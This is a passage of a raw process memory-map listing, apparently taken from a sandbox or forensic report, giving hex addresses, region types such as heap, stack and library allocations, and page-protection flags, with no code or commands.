page read and write
1C4CE22A000
heap
page read and write
139D8A39000
heap
page read and write
2546BBE8000
heap
page read and write
24593A3F000
heap
page read and write
1C4CE22A000
heap
page read and write
2DB309A0000
heap
page read and write
1ECD44AF000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
7FF83BA40000
trusted library allocation
page read and write
18C71E90000
heap
page read and write
2546B78D000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1AA4F820000
heap
page read and write
1A7C6803000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
7FF83BA60000
trusted library allocation
page read and write
1BA5B0BA000
trusted library allocation
page read and write
139D8AB2000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
7FF83B982000
trusted library allocation
page read and write
2459179D000
heap
page read and write
7FF83BB30000
trusted library allocation
page read and write
21055D0B000
heap
page read and write
1AA4F7E0000
heap
page read and write
1AA617B1000
trusted library allocation
page read and write
2081FE6B000
trusted library allocation
page read and write
1C4D07CB000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
1ECD441F000
heap
page read and write
1AA4F8C7000
heap
page read and write
2103BC90000
heap
page read and write
18C00108000
trusted library allocation
page read and write
24593A05000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
2178F5CD000
trusted library allocation
page read and write
BF539B7000
stack
page read and write
1EF4FD70000
heap
page read and write
7FF83B84C000
trusted library allocation
page execute and read and write
1AA4FA30000
trusted library allocation
page read and write
24593D38000
heap
page read and write
2391BF11000
trusted library allocation
page read and write
1AA51C4F000
trusted library allocation
page read and write
204E7FA3000
heap
page read and write
2D4A7BE000
stack
page read and write
1ECD68DF000
trusted library allocation
page read and write
18C00102000
trusted library allocation
page read and write
1C4CFFDB000
heap
page read and write
174D4BED000
trusted library allocation
page read and write
5399B7E000
stack
page read and write
1ECEE5F9000
heap
page read and write
18980001000
trusted library allocation
page read and write
1C4D0117000
heap
page read and write
25469B50000
heap
page read and write
B9A5BFF000
stack
page read and write
2081FD28000
trusted library allocation
page read and write
2546B741000
heap
page read and write
7FF83B7D4000
trusted library allocation
page read and write
245935DC000
heap
page read and write
1A8E13F6000
trusted library allocation
page read and write
1ECD5EA0000
trusted library allocation
page read and write
18C000ED000
trusted library allocation
page read and write
7FF83B7C3000
trusted library allocation
page execute and read and write
1EF5330C000
trusted library allocation
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1ECD6AAA000
trusted library allocation
page read and write
1A8DDCE6000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1C4D02A6000
heap
page read and write
23924088000
heap
page read and write
1C4D04F8000
heap
page read and write
9FC397D000
stack
page read and write
1C4CE21B000
heap
page read and write
7FF83B7D3000
trusted library allocation
page execute and read and write
2DB30818000
heap
page read and write
204E74AB000
heap
page read and write
189FC0F0000
trusted library allocation
page read and write
139D8AB0000
heap
page read and write
245935F0000
heap
page read and write
7FF83B9B0000
trusted library allocation
page read and write
1FBCD5F0000
trusted library allocation
page read and write
7FF83BA80000
trusted library allocation
page read and write
204E74C5000
heap
page read and write
955B4FE000
stack
page read and write
1C4D04C3000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
539978E000
stack
page read and write
5399DF8000
stack
page read and write
1A7C6801000
heap
page read and write
189FC130000
heap
page readonly
7FF83B85C000
trusted library allocation
page execute and read and write
7FF83BA60000
trusted library allocation
page read and write
174D2D90000
heap
page read and write
208113E0000
trusted library allocation
page read and write
1A7C6C6E000
heap
page read and write
24591767000
heap
page read and write
7FF83B850000
trusted library allocation
page read and write
24593648000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
883C5BE000
stack
page read and write
1C4D048B000
heap
page read and write
24593D68000
heap
page read and write
1C4CE22A000
heap
page read and write
204E7F72000
heap
page read and write
7FF83B794000
trusted library allocation
page read and write
2D4A83B000
stack
page read and write
1A7C67CA000
heap
page read and write
1C4D0481000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
BF53CBC000
stack
page read and write
1C4CFFE2000
heap
page read and write
18C006AA000
trusted library allocation
page read and write
1FBCB590000
heap
page read and write
7FF83BB20000
trusted library allocation
page read and write
18C007FE000
trusted library allocation
page read and write
2390C00F000
trusted library allocation
page read and write
2390BF00000
heap
page read and write
2080DEC4000
heap
page read and write
2D4A63E000
stack
page read and write
1A8DDC70000
trusted library allocation
page read and write
5768FFE000
stack
page read and write
24593D46000
heap
page read and write
1C4D011A000
heap
page read and write
174D2E45000
heap
page read and write
1A7C6C24000
heap
page read and write
B9A6338000
stack
page read and write
7FF83BAF0000
trusted library allocation
page read and write
D014FE000
stack
page read and write
2080E0F0000
heap
page read and write
24593ABE000
heap
page read and write
139D8A37000
heap
page read and write
98D67FC000
stack
page read and write
174D4FC3000
trusted library allocation
page read and write
1AA4FA60000
heap
page execute and read and write
2103D704000
heap
page read and write
24593A45000
heap
page read and write
2DB325F0000
trusted library allocation
page read and write
7FF83B9C0000
trusted library allocation
page execute and read and write
7FF83B9B0000
trusted library allocation
page read and write
1A7C6855000
heap
page read and write
1ECD6503000
trusted library allocation
page read and write
1C4D04F8000
heap
page read and write
1BA5A670000
heap
page execute and read and write
2DB32701000
trusted library allocation
page read and write
7FF83B870000
trusted library allocation
page read and write
7FF83B890000
trusted library allocation
page execute and read and write
204E7C7D000
heap
page read and write
208114A2000
trusted library allocation
page read and write
174D4C6B000
trusted library allocation
page read and write
24593A79000
heap
page read and write
18980117000
trusted library allocation
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
1EF4FDB4000
heap
page read and write
1008BE000
stack
page read and write
64F53FF000
stack
page read and write
7FF83B7D0000
trusted library allocation
page read and write
139D8A3E000
heap
page read and write
139D8A4E000
heap
page read and write
1AA51A98000
trusted library allocation
page read and write
2459360C000
heap
page read and write
2546B73D000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
204E7C72000
heap
page read and write
2080DE9E000
heap
page read and write
245916FE000
heap
page read and write
1C4CE20E000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
B9A6F0E000
stack
page read and write
18C00085000
trusted library allocation
page read and write
1C4CE1C5000
heap
page read and write
245935FC000
heap
page read and write
18C71EA0000
heap
page read and write
24593D15000
heap
page read and write
7FF83B7DD000
trusted library allocation
page execute and read and write
56170FF000
stack
page read and write
1ECD45A0000
heap
page read and write
2459361E000
heap
page read and write
245938D6000
heap
page read and write
955B57E000
stack
page read and write
7FF83BA90000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
1A8F7EB0000
heap
page read and write
174D4C29000
trusted library allocation
page read and write
217A6C40000
heap
page read and write
561783C000
stack
page read and write
24593625000
heap
page read and write
174D50CE000
trusted library allocation
page read and write
1AA4F7B0000
heap
page read and write
1C4CE1F9000
heap
page read and write
7FF83B856000
trusted library allocation
page read and write
189FC0D0000
trusted library section
page read and write
5617638000
stack
page read and write
24593618000
heap
page read and write
7FF83B950000
trusted library allocation
page execute and read and write
1C4CFFFD000
heap
page read and write
1A7C49B6000
heap
page read and write
1A7C6C35000
heap
page read and write
2080DCB0000
heap
page read and write
1C4D011B000
heap
page read and write
1EF532A3000
trusted library allocation
page read and write
7FF83BA10000
trusted library allocation
page read and write
B9A607E000
stack
page read and write
204E7491000
heap
page read and write
20827DD5000
heap
page read and write
7FF83B88C000
trusted library allocation
page execute and read and write
FE1AC7E000
stack
page read and write
1FBCD3DD000
trusted library allocation
page read and write
7FF83B7AB000
trusted library allocation
page read and write
24593D0E000
heap
page read and write
1C4D07EB000
heap
page read and write
1ECD695F000
trusted library allocation
page read and write
1C4D011D000
heap
page read and write
18C71D90000
heap
page read and write
2459178E000
heap
page read and write
2082823D000
heap
page read and write
91B0D53000
stack
page read and write
7FF83BA04000
trusted library allocation
page read and write
204E748B000
heap
page read and write
9FC38FF000
stack
page read and write
2D4A0FF000
stack
page read and write
1C4D000C000
heap
page read and write
254698A0000
heap
page read and write
24591770000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
245935C6000
heap
page read and write
1C4D0481000
heap
page read and write
139D8A86000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
139D8AB0000
heap
page read and write
1C4CFFD5000
heap
page read and write
883C27E000
stack
page read and write
7FF83B9B2000
trusted library allocation
page read and write
2546B7AA000
heap
page read and write
2178E536000
heap
page read and write
2178E8B3000
trusted library allocation
page read and write
7FF83B940000
trusted library allocation
page read and write
1C4D07D9000
heap
page read and write
24591788000
heap
page read and write
24593D1C000
heap
page read and write
D0147F000
stack
page read and write
254698E0000
heap
page read and write
1C4D0826000
heap
page read and write
7FF7A1984000
unkown
page readonly
7FF83BAB0000
trusted library allocation
page read and write
1C4D0826000
heap
page read and write
24593A81000
heap
page read and write
1C4D07C0000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
7FF83BA8C000
trusted library allocation
page read and write
7FF83B972000
trusted library allocation
page read and write
204E7F91000
heap
page read and write
2178E4B0000
trusted library allocation
page read and write
7FF83B7E0000
trusted library allocation
page read and write
1A8F7F49000
heap
page read and write
1ECEE740000
heap
page read and write
1A7C49DF000
heap
page read and write
24593601000
heap
page read and write
1C4D04FC000
heap
page read and write
98D66FE000
stack
page read and write
189FDF33000
trusted library allocation
page read and write
2390C556000
trusted library allocation
page read and write
7FF83B846000
trusted library allocation
page read and write
2546BC32000
heap
page read and write
24593A49000
heap
page read and write
1A7C6F10000
heap
page read and write
189FDFE1000
heap
page read and write
2178E9A1000
trusted library allocation
page read and write
1BA5AE62000
trusted library allocation
page read and write
883C7BE000
stack
page read and write
1A7C67E2000
heap
page read and write
7FF83B9B0000
trusted library allocation
page execute and read and write
139D8AB0000
heap
page read and write
7FF7A1981000
unkown
page write copy
85F44FC000
stack
page read and write
24593772000
heap
page read and write
1A7C6904000
heap
page read and write
1EF51C71000
trusted library allocation
page read and write
18C6FD06000
heap
page read and write
1A7C6B70000
heap
page read and write
189800A1000
trusted library allocation
page read and write
1C4CE320000
heap
page read and write
1A7C6907000
heap
page read and write
1A7C6806000
heap
page read and write
7FF83B85C000
trusted library allocation
page execute and read and write
1C4D07FA000
heap
page read and write
FE1AAFF000
stack
page read and write
174D2F60000
trusted library allocation
page read and write
2546B789000
heap
page read and write
1BA72C50000
heap
page read and write
189FDF57000
heap
page execute and read and write
1C4D0007000
heap
page read and write
1001FF000
stack
page read and write
7FF83B9E0000
trusted library allocation
page read and write
9FC3CFE000
stack
page read and write
1A7C680A000
heap
page read and write
955B27E000
stack
page read and write
245935CD000
heap
page read and write
174D2DB0000
heap
page read and write
7FF83BA70000
trusted library allocation
page read and write
245935FC000
heap
page read and write
1A7C6902000
heap
page read and write
139D8AB0000
heap
page read and write
7FF83B9F0000
trusted library allocation
page read and write
7FF83B7B0000
trusted library allocation
page read and write
20811397000
trusted library allocation
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1AA4F87D000
heap
page read and write
2546BBCC000
heap
page read and write
B9A5E7F000
stack
page read and write
1AA61827000
trusted library allocation
page read and write
21790676000
trusted library allocation
page read and write
18C004E0000
trusted library allocation
page read and write
139D8E05000
heap
page read and write
1A8E161D000
trusted library allocation
page read and write
7FF83B793000
trusted library allocation
page execute and read and write
18C6FE00000
trusted library allocation
page read and write
2DB30A2B000
heap
page read and write
2DB4A991000
heap
page read and write
561773E000
stack
page read and write
1C4D04E6000
heap
page read and write
B9A5B72000
stack
page read and write
2DB30A00000
heap
page read and write
2390C7B6000
trusted library allocation
page read and write
1C4D07EF000
heap
page read and write
18C6FD1E000
heap
page read and write
7FF83BA74000
trusted library allocation
page read and write
10093E000
stack
page read and write
1FBCB560000
trusted library allocation
page read and write
1A7C6B96000
heap
page read and write
D0157E000
stack
page read and write
1C4D0058000
heap
page read and write
245939F9000
heap
page read and write
2546BC3C000
heap
page read and write
2DB426F1000
trusted library allocation
page read and write
254699A0000
heap
page read and write
1ECEE661000
heap
page read and write
1C4D0058000
heap
page read and write
204E7CAE000
heap
page read and write
1C4D0436000
heap
page read and write
1C4CFFE9000
heap
page read and write
18C6FE55000
heap
page read and write
2546BA46000
heap
page read and write
7FF83B794000
trusted library allocation
page read and write
1A7C6855000
heap
page read and write
18C6FCDE000
heap
page read and write
1ECD68E1000
trusted library allocation
page read and write
1FBE5433000
heap
page read and write
1A7C6837000
heap
page read and write
BF538F8000
stack
page read and write
2080DE49000
heap
page read and write
174D539E000
trusted library allocation
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1A7C681B000
heap
page read and write
21790067000
trusted library allocation
page read and write
1A7C6BF5000
heap
page read and write
D018BE000
stack
page read and write
217A6DED000
heap
page read and write
2546BF21000
heap
page read and write
2103BD5B000
heap
page read and write
18C6FE40000
trusted library allocation
page read and write
7FF83B8B0000
trusted library allocation
page execute and read and write
2103D706000
heap
page read and write
7FF83BB00000
trusted library allocation
page read and write
174D4C2C000
trusted library allocation
page read and write
2080FCA0000
heap
page execute and read and write
1AA51920000
trusted library allocation
page read and write
139D8A88000
heap
page read and write
7FF83B8C0000
trusted library allocation
page execute and read and write
FE1AFB8000
stack
page read and write
1FBCB580000
trusted library allocation
page read and write
2103F8BB000
trusted library allocation
page read and write
1C4D04B2000
heap
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
217A69AA000
heap
page read and write
1C4D0058000
heap
page read and write
189FDF60000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
7FF83B9E0000
trusted library allocation
page read and write
189FE022000
heap
page read and write
24593AB5000
heap
page read and write
FE1AEB7000
stack
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
174E4B3C000
trusted library allocation
page read and write
1C4CFFFC000
heap
page read and write
18C003DC000
trusted library allocation
page read and write
1FBCB2F0000
heap
page read and write
1C4CFFDA000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
7FF83BA50000
trusted library allocation
page read and write
1A7C6C5F000
heap
page read and write
2546B7AF000
heap
page read and write
1C4D07C1000
heap
page read and write
18C6FDC0000
heap
page read and write
1A7C681B000
heap
page read and write
2DB32CBA000
trusted library allocation
page read and write
7FF83B7EB000
trusted library allocation
page read and write
1A8DDC80000
heap
page readonly
1ECEE61C000
heap
page read and write
20828219000
heap
page read and write
2103BD17000
heap
page read and write
1A8DDAB0000
heap
page read and write
7FF83B94A000
trusted library allocation
page read and write
7FF83BAA0000
trusted library allocation
page read and write
1AA5191C000
trusted library allocation
page read and write
2103DBB1000
trusted library allocation
page read and write
2DB42769000
trusted library allocation
page read and write
1FBE5480000
heap
page execute and read and write
1ECD4417000
heap
page read and write
7FF83B79D000
trusted library allocation
page execute and read and write
2546B754000
heap
page read and write
10057F000
stack
page read and write
1C4D080B000
heap
page read and write
204E7C95000
heap
page read and write
2081FFA3000
trusted library allocation
page read and write
139D8A3B000
heap
page read and write
18C71C51000
heap
page read and write
1BA5AAC2000
trusted library allocation
page read and write
7FF83B9A2000
trusted library allocation
page read and write
1A7C6A73000
heap
page read and write
91B14B9000
stack
page read and write
7FF83B932000
trusted library allocation
page read and write
204E7C6E000
heap
page read and write
2546B795000
heap
page read and write
139D8AB0000
heap
page read and write
189FBFDF000
heap
page read and write
1FBCD3E3000
trusted library allocation
page read and write
7FF83B8F0000
trusted library allocation
page execute and read and write
5399683000
stack
page read and write
174ECDCA000
heap
page read and write
1C4CE4C0000
heap
page read and write
2DB4A897000
heap
page read and write
FE1AE3E000
stack
page read and write
2DB326F1000
trusted library allocation
page read and write
1A8DD9D0000
heap
page read and write
24593609000
heap
page read and write
1C4CE1D9000
heap
page read and write
24593AAD000
heap
page read and write
139D8AAE000
heap
page read and write
1C4D084B000
heap
page read and write
1A8E123F000
trusted library allocation
page read and write
7FF83BA6D000
trusted library allocation
page read and write
20827D7D000
heap
page read and write
245936E0000
remote allocation
page read and write
1A7C6BE1000
heap
page read and write
18C0013F000
trusted library allocation
page read and write
1C4D07A0000
heap
page read and write
1ECD6570000
trusted library allocation
page read and write
24593D38000
heap
page read and write
139D8A42000
heap
page read and write
2546B789000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
1FBCD3E7000
trusted library allocation
page read and write
174D2EDD000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
245935E1000
heap
page read and write
1FBCB358000
heap
page read and write
21055DAA000
heap
page read and write
2546B775000
heap
page read and write
1C4D0481000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
7FF83B846000
trusted library allocation
page read and write
1A7C49D0000
heap
page read and write
24593A9A000
heap
page read and write
1C4D0058000
heap
page read and write
23924130000
heap
page read and write
217A6B1D000
heap
page read and write
7FF83B9E0000
trusted library allocation
page read and write
2459361B000
heap
page read and write
24591728000
heap
page read and write
7FF83B7A0000
trusted library allocation
page read and write
7FF83B941000
trusted library allocation
page read and write
7FF83B9A0000
trusted library allocation
page read and write
20827E60000
heap
page read and write
189FE4D0000
heap
page read and write
245935CD000
heap
page read and write
245919C9000
heap
page read and write
1C4D04C6000
heap
page read and write
24591725000
heap
page read and write
245935DC000
heap
page read and write
7FF83BA81000
trusted library allocation
page read and write
2DB4A869000
heap
page read and write
1C4CFFDB000
heap
page read and write
245916EB000
heap
page read and write
1C4D04F8000
heap
page read and write
1C4D04A8000
heap
page read and write
7FF83BA20000
trusted library allocation
page read and write
1A8DDB74000
heap
page read and write
1C4D083F000
heap
page read and write
1C4D04FD000
heap
page read and write
2080FD36000
trusted library allocation
page read and write
FE1ADF9000
stack
page read and write
7FF83B9F0000
trusted library allocation
page read and write
7FF83B9F0000
trusted library allocation
page read and write
7FF83BAA0000
trusted library allocation
page read and write
2546B799000
heap
page read and write
7FF83B962000
trusted library allocation
page read and write
7FF83B9C0000
trusted library allocation
page execute and read and write
9FC3EFC000
stack
page read and write
1C4CE206000
heap
page read and write
7FF83B870000
trusted library allocation
page read and write
2546BB30000
remote allocation
page read and write
1AA517EE000
trusted library allocation
page read and write
883D40D000
stack
page read and write
7FF83B7D2000
trusted library allocation
page read and write
1A7C6BF5000
heap
page read and write
24593A23000
heap
page read and write
1AA6985E000
heap
page read and write
24591758000
heap
page read and write
24591767000
heap
page read and write
1C4D07D1000
heap
page read and write
D0193B000
stack
page read and write
1A7C6900000
heap
page read and write
1BA5AE5E000
trusted library allocation
page read and write
1FBCB370000
heap
page read and write
1A7C499D000
heap
page read and write
1BA58D47000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
F5095FD000
stack
page read and write
254699B0000
heap
page read and write
7FF83B94A000
trusted library allocation
page read and write
189FC174000
heap
page read and write
1AA4FB00000
trusted library allocation
page read and write
1C4D02A3000
heap
page read and write
1BA58DF0000
heap
page read and write
18C00567000
trusted library allocation
page read and write
1ECD6AB5000
trusted library allocation
page read and write
2DB42701000
trusted library allocation
page read and write
1BA72CA2000
heap
page read and write
24591706000
heap
page read and write
2546BC15000
heap
page read and write
24593AAB000
heap
page read and write
7FF83B8A6000
trusted library allocation
page execute and read and write
2546B789000
heap
page read and write
2459179D000
heap
page read and write
B9A5F7D000
stack
page read and write
204E749B000
heap
page read and write
174D2E90000
heap
page read and write
7FF83B7DB000
trusted library allocation
page read and write
2D4A538000
stack
page read and write
24591720000
heap
page read and write
24591788000
heap
page read and write
1BA5AE9A000
trusted library allocation
page read and write
1BA5AB88000
trusted library allocation
page read and write
7FF83B81C000
trusted library allocation
page execute and read and write
1A8F7A1D000
heap
page read and write
2080DE80000
heap
page read and write
24591770000
heap
page read and write
1C4D04AB000
heap
page read and write
1A7C6BF5000
heap
page read and write
18C71CF0000
heap
page execute and read and write
955B7FE000
stack
page read and write
18980040000
trusted library allocation
page read and write
2103F5CB000
trusted library allocation
page read and write
1A7C6849000
heap
page read and write
7FF83B94A000
trusted library allocation
page read and write
1A7C6C3B000
heap
page read and write
85F3BEF000
stack
page read and write
7FF83B970000
trusted library allocation
page read and write
1C4D04FE000
heap
page read and write
1C4CFFD8000
heap
page read and write
9FC3A7E000
stack
page read and write
1C4D07DA000
heap
page read and write
1EF51BE0000
heap
page execute and read and write
18980491000
trusted library allocation
page read and write
1C4CFFFF000
heap
page read and write
24593A59000
heap
page read and write
2390C018000
trusted library allocation
page read and write
2080E0E0000
trusted library allocation
page read and write
9FC3AFE000
stack
page read and write
7FF83B876000
trusted library allocation
page read and write
1C4CE226000
heap
page read and write
139D8AB2000
heap
page read and write
7FF83B8B0000
trusted library allocation
page execute and read and write
2390BFCB000
trusted library allocation
page read and write
7FF83B8E0000
trusted library allocation
page execute and read and write
24593ABE000
heap
page read and write
9FC494E000
stack
page read and write
BF533EF000
stack
page read and write
2546999A000
heap
page read and write
2DB32560000
trusted library allocation
page read and write
566787E000
stack
page read and write
2390C3C5000
trusted library allocation
page read and write
2080DEC6000
heap
page read and write
7FF83B840000
trusted library allocation
page read and write
883C93B000
stack
page read and write
139D8A88000
heap
page read and write
7FF83B850000
trusted library allocation
page read and write
204E74C5000
heap
page read and write
7FF83B7C3000
trusted library allocation
page execute and read and write
139D8A5E000
heap
page read and write
7FF83B7CD000
trusted library allocation
page execute and read and write
56171FE000
stack
page read and write
1EF69E7E000
heap
page read and write
18C6FCC0000
heap
page read and write
2103F417000
trusted library allocation
page read and write
1A7C49CC000
heap
page read and write
24593604000
heap
page read and write
1A8E103D000
trusted library allocation
page read and write
2103F2B7000
trusted library allocation
page read and write
7FF83B7CD000
trusted library allocation
page execute and read and write
18980111000
trusted library allocation
page read and write
2546BA54000
heap
page read and write
23924220000
heap
page execute and read and write
7FF83B880000
trusted library allocation
page read and write
1A7C680A000
heap
page read and write
2546BC3A000
heap
page read and write
245919CE000
heap
page read and write
1BA5AB8F000
trusted library allocation
page read and write
2179EA10000
trusted library allocation
page read and write
1C4CE185000
heap
page read and write
24593A45000
heap
page read and write
2459361B000
heap
page read and write
2080DE82000
heap
page read and write
1C4D0466000
heap
page read and write
7FF83BA70000
trusted library allocation
page read and write
1EF53306000
trusted library allocation
page read and write
24593A02000
heap
page read and write
9FC3502000
stack
page read and write
1ECD6461000
trusted library allocation
page read and write
24593D1B000
heap
page read and write
1BA5A734000
heap
page read and write
20827DA6000
heap
page read and write
7FF83B8A6000
trusted library allocation
page execute and read and write
1ECD5DB0000
heap
page read and write
1A7C6826000
heap
page read and write
189FC02B000
heap
page read and write
1C4D0029000
heap
page read and write
1C4D02B5000
heap
page read and write
1A8E063D000
trusted library allocation
page read and write
2546BC34000
heap
page read and write
245938D6000
heap
page read and write
2546BC45000
heap
page read and write
1FBE5469000
heap
page read and write
139D8AAC000
heap
page read and write
204E7C71000
heap
page read and write
25469890000
heap
page read and write
1A7C680A000
heap
page read and write
1BA72C47000
heap
page execute and read and write
7FF83BA80000
trusted library allocation
page read and write
204E748B000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
1A8DDB6D000
heap
page read and write
245935F1000
heap
page read and write
7FF83B7C7000
trusted library allocation
page read and write
189804AC000
trusted library allocation
page read and write
1C4CE150000
heap
page read and write
204E7A73000
heap
page read and write
883C47E000
stack
page read and write
1A7C68F0000
remote allocation
page read and write
7FF83BB00000
trusted library allocation
page read and write
245919CE000
heap
page read and write
2459361B000
heap
page read and write
2459173C000
heap
page read and write
174D51AD000
trusted library allocation
page read and write
24593A45000
heap
page read and write
24591744000
heap
page read and write
1A7C6813000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
25469917000
heap
page read and write
7FF83BA40000
trusted library allocation
page read and write
139D8A86000
heap
page read and write
1EF4FDAC000
heap
page read and write
1A7C48B0000
heap
page read and write
7FF83B98A000
trusted library allocation
page read and write
2459171E000
heap
page read and write
1FBCB4E0000
heap
page read and write
2390B9B0000
trusted library allocation
page read and write
2546B7B4000
heap
page read and write
24591770000
heap
page read and write
1A8F7C43000
heap
page read and write
18C71C9D000
heap
page read and write
1FBE5380000
heap
page read and write
7FF83B846000
trusted library allocation
page read and write
1A7C6C2D000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
2546BA52000
heap
page read and write
1A8DF8D0000
heap
page execute and read and write
2080F760000
trusted library allocation
page read and write
18980536000
trusted library allocation
page read and write
7FF83BA30000
trusted library allocation
page read and write
1A7C4C90000
heap
page read and write
2390BA85000
heap
page read and write
7FF83B8E0000
trusted library allocation
page execute and read and write
189FBFE8000
heap
page read and write
24593A90000
heap
page read and write
1FBCDB5A000
trusted library allocation
page read and write
1C4D04F2000
heap
page read and write
1BA58E40000
heap
page read and write
1A7C6855000
heap
page read and write
566727E000
stack
page read and write
1C4CE1AC000
heap
page read and write
1EF5391E000
trusted library allocation
page read and write
1FBCB318000
heap
page read and write
204E7F86000
heap
page read and write
1A7C6A73000
heap
page read and write
245917AA000
heap
page read and write
1C4D0040000
heap
page read and write
1ECD4459000
heap
page read and write
10017F000
stack
page read and write
7FF83BA90000
trusted library allocation
page read and write
2DB4A8F3000
heap
page read and write
7FF83B7E0000
trusted library allocation
page read and write
139D8AB7000
heap
page read and write
1FBCD35A000
trusted library allocation
page read and write
1C4D0826000
heap
page read and write
174D3025000
heap
page read and write
1FBCB5B0000
trusted library allocation
page read and write
1FBDD2E0000
trusted library allocation
page read and write
2DB32838000
trusted library allocation
page read and write
2390C051000
trusted library allocation
page read and write
1AA4FB10000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
7FF83B9A0000
trusted library allocation
page read and write
2178E8F0000
heap
page execute and read and write
2546BA54000
heap
page read and write
25469980000
heap
page read and write
2D4A27E000
stack
page read and write
7FF83BA90000
trusted library allocation
page read and write
204E74AF000
heap
page read and write
9FC3DFF000
stack
page read and write
2DB32C0E000
trusted library allocation
page read and write
20827E40000
heap
page read and write
25469971000
heap
page read and write
24593D14000
heap
page read and write
1BA72C56000
heap
page read and write
174D4C25000
trusted library allocation
page read and write
2D4A17E000
stack
page read and write
174D4C79000
trusted library allocation
page read and write
7FF83B8B0000
trusted library allocation
page execute and read and write
1BA58D23000
heap
page read and write
1C4D041E000
heap
page read and write
217A6C20000
heap
page read and write
64F5AFB000
stack
page read and write
566777E000
stack
page read and write
1C4D0481000
heap
page read and write
1EF51AA3000
trusted library allocation
page read and write
1FBCD331000
trusted library allocation
page read and write
1AA4F8CA000
heap
page read and write
2546BBC7000
heap
page read and write
1AA51D18000
trusted library allocation
page read and write
2459377A000
heap
page read and write
1C4D07EB000
heap
page read and write
1C4D0472000
heap
page read and write
24593AB3000
heap
page read and write
D017BE000
stack
page read and write
2459367F000
heap
page read and write
57691FF000
stack
page read and write
7FF83BA60000
trusted library allocation
page read and write
1C4D02B5000
heap
page read and write
174D2DF0000
heap
page read and write
24591729000
heap
page read and write
7FF7A1780000
unkown
page readonly
245916D0000
heap
page read and write
1C4D04AF000
heap
page read and write
204E749F000
heap
page read and write
20827D23000
heap
page read and write
1C4D0006000
heap
page read and write
174D2F80000
heap
page read and write
1AA4F89F000
heap
page read and write
1FBE55CD000
heap
page read and write
24591690000
heap
page read and write
174D4BE3000
trusted library allocation
page read and write
1C4CE1B2000
heap
page read and write
139D8AB2000
heap
page read and write
2390A135000
heap
page read and write
1AA51910000
trusted library allocation
page read and write
7FF83B9A2000
trusted library allocation
page read and write
7FF83BB00000
trusted library allocation
page read and write
24593A49000
heap
page read and write
174D4B63000
trusted library allocation
page read and write
1FBCD88C000
trusted library allocation
page read and write
2081137E000
trusted library allocation
page read and write
D013FE000
stack
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
24593A7C000
heap
page read and write
7FF83BA60000
trusted library allocation
page read and write
18C6FB80000
heap
page read and write
1C4CE1CA000
heap
page read and write
1AA4F84A000
heap
page read and write
7FF83B7FC000
trusted library allocation
page execute and read and write
1C4D04D5000
heap
page read and write
1A8F7BE6000
heap
page read and write
1A7C67F0000
heap
page read and write
1EF53922000
trusted library allocation
page read and write
1C4D0002000
heap
page read and write
189FBFA0000
heap
page read and write
1FBDD2D1000
trusted library allocation
page read and write
2390C00B000
trusted library allocation
page read and write
7FF83B794000
trusted library allocation
page read and write
217A6BAE000
heap
page read and write
24593A49000
heap
page read and write
24593D0F000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
204E7FA3000
heap
page read and write
174D4C54000
trusted library allocation
page read and write
18C0005E000
trusted library allocation
page read and write
7FF83B880000
trusted library allocation
page read and write
1FBE5443000
heap
page read and write
7FF83BA40000
trusted library allocation
page read and write
139D8C40000
remote allocation
page read and write
208281E4000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
1C4CFFDB000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
1A8F7BBD000
heap
page read and write
1C4CE225000
heap
page read and write
1A7C6C18000
heap
page read and write
2103F2B2000
trusted library allocation
page read and write
1C4D086A000
heap
page read and write
1EF5332D000
trusted library allocation
page read and write
2459178E000
heap
page read and write
2546B9C0000
heap
page read and write
7FF83BA70000
trusted library allocation
page read and write
7FF83BAE0000
trusted library allocation
page read and write
245935F8000
heap
page read and write
18C71B40000
heap
page execute and read and write
7FF83B9A2000
trusted library allocation
page read and write
1A7C6F11000
heap
page read and write
24593AAC000
heap
page read and write
1AA51DE6000
trusted library allocation
page read and write
245935E3000
heap
page read and write
F5099FB000
stack
page read and write
1ECD5F40000
heap
page read and write
1005FF000
stack
page read and write
91B16BE000
stack
page read and write
883C8BE000
stack
page read and write
7FF83B886000
trusted library allocation
page read and write
204E7C7C000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
2178CC84000
heap
page read and write
139D8AB7000
heap
page read and write
204E7F71000
heap
page read and write
2546B789000
heap
page read and write
1A7C67F3000
heap
page read and write
1A8F7EC0000
heap
page read and write
25469B10000
heap
page read and write
1BA72C40000
heap
page execute and read and write
189FE01B000
heap
page read and write
1AA4F885000
heap
page read and write
189FDF6C000
heap
page read and write
91B15BE000
stack
page read and write
7FF83B8A6000
trusted library allocation
page execute and read and write
7FF83BAC0000
trusted library allocation
page read and write
2546BBD3000
heap
page read and write
91B1379000
